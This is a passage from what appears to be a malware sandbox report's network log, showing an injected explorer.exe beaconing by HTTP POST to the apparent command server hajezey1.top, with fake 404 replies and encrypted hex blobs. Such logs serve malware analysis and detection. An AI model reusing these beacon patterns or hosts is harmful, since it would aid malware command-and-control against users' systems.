6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            27192.168.2.549816185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:48.818876982 CEST9539OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://mdonp.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 127
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:48.902971029 CEST9539INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:48 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            28192.168.2.549817185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:48.989521980 CEST9919OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://hfxrwj.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 221
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:49.069186926 CEST9920INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:49 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da 68 22 bd c8 cb cf 3f ef c8 a9 a6 cc d5 02 47 71 98 66 3c 3d f8 bf cb 67 3f d8 97 24 a9 b9 fc f0 ba e8 57 2d c8 a1 11 19 af 7b 69 ad 72 5b 80 1c 97 36 db 64 11 82 f5 51 aa 3b c5 da a7 f1 7d 87 02 f3 35 43 25 11 00 ac 49 1d 02 a1 b7 28 e4 f0 f7 11 41 a6 a4 87 35 ce 19 c3 ce 85 d5 3a 94 d4 1b e4 2f 62 f1 22 27 c6 99 0a d7 d9 76 c5 89 10 c1 8b ba 97 28 35 bd a8 8f 59 9d 9b cf d5 f5 de 35 1f 98 92 f2 b2 6a 05 85 85 0a 9f 12 6f 03 62 53 b5 f8 80 99 8b 84 80 7f 1d b8 78 c0 b4 a7 a4 d0 91 46 e8 81 2f 0d 4d 76 00 94 23 c7 8e 07 e8 df 4a 17 7a 8d 42 14 7e 26 a0 81 ba 07 47 7d bb fb ce 3b 33 f0 82 6c 27 b4 e3 e4 ce 70 68 98 3b 6a fe da 3d b3 f5 3f 78 81 42 7b f9 e8 f0 85 a5 46 e5
                                                            Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|M+%t+xQ<e2P0YObyT=a'4! YU\dIXKg[Ge92)g z6\E'}WpHk"HI?o|6NI[LeU[0z;+W~5=PVpGZlqV@q!UvyOZ:-A%GkKm@NQ>[J8},s"JG0Z"?kQTJMQCd%\!&Q#F<pvA>C/CbGBj4VFv2Bo]6HPg5P[Fj6'NGc_,/DO9W%bJR}Tzl9^\mc=>"}h`1%@GN!K.iwA0!Wnawjg";kzRN{},zHB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;=g&9c0{%#=9FX?SCnv4ddOU^Tiz=p.jh"?Gqf<=g?$W-{ir[6dQ;}5C%I(A5:/b"'v(5Y5jobSxF/Mv#JzB~&G};3l'ph;j=?xB{F


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            29192.168.2.549818185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:50.812760115 CEST10087OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://jxvawpr.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 164
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:50.890203953 CEST10088INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:50 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3192.168.2.549826162.159.133.233443C:\Users\user\AppData\Local\Temp\77DC.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            30192.168.2.549819185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:50.984064102 CEST10089OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ctbemocusw.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 178
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:51.067217112 CEST10090INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:51 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            31192.168.2.549820185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:51.153032064 CEST10091OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://wofjmrw.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 368
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:51.230870008 CEST10092INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:51 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            32192.168.2.549821185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:51.316617012 CEST10093OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://xdcmurwfts.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 260
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:51.397310972 CEST10094INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:51 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            33192.168.2.549822185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:51.494786024 CEST10094OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://drroxf.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 173
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:51.574101925 CEST10096INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:51 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b f7 79 8d fb c4 4d c2 ec 5d 4f 5f 5b ff 33 90 5f 84 e2 eb 0b 4a 05 8e 8b a4 d4 ac e4 80 54 fd 17 d2 ea 4f e8 a1 1e c7 1f ab 29 29 8c 97 ad 67 c0 78 b7 bc 72 3f 1a 7c 03 84 5e 85 63 91 5b 07 e9 1f 9d 15 46 a6 b3 58 f1 06 ee 0c 42 de 8b f4 24 eb a8 e1 48 29 e8 74 cc 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f 61 79 b7 9e 96 98 8b 36 19 19 cb 8a f3 d8 04 0f 4e 86 19 7d 6f 37 e3 04 89 3d a4 55 80 90 70 89 9c 2c 4b 6b b6 e2 a2 22 48 d2 d1 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 eb 5f c8 c3 e7 b2 ec 24 1a 0a 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 54 8c f5 0a ef 8b 71 91 e0 35 a3 64 49 e0 76 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa cb f9 b0 72 50 6d ec f0 52 a4 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 d2 ab 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 60 9c 82 4b d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 e3 40 3d 9d 43 cd 17 fe 2f 89 9d f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 7e af da 11 4b 95 36 2a 21 3f 65 74 b0 bb 87 f6 aa 81 de bb a0 69 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 9f 3a 48 93 9f 4e bd 44 ef 5a 89 4f dc ea c0 4a 00 97 af a4 57 25 11 bb d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 11 e6 cc 64 3d da 9a 56 3a 22 7d e6 d2 1b 62 b9 50 31 eb cd 14 26 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 12 c3 b2 a5 83 41 ab 13 af b8 e8 81 63 a2 57 4a 60 87 bd 5f 6e 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 dc 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac cf 3f ef ba a9 a6 cc b4 02 47 71 f5 66 3c 3d d8 bf cb 67 5c d8 97 24 c8 b9 fc f0 d4 e8 57 2d a6 a1 11 19 c0 7b 69 ad 06 5b 80 1c b7 36 db 64 73 82 f5 51 cf 3b c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 27 1d 02 a1 97 28 e4 f0 